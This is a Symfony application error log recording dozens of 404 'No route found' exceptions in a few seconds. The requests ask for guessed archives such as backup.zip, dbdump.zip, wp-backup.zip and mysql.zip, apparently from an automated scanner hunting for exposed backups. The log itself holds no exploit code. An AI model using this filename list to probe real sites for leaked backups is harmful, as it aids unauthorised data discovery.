[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /static.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /static.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /attachments.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /attachments.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /json.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /json.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domains.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domains.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /upload.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /upload.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /uploads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /uploads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbdump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbdump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mssql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mssql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_monthly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_monthly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bak.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bak.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /snapshot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /snapshot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
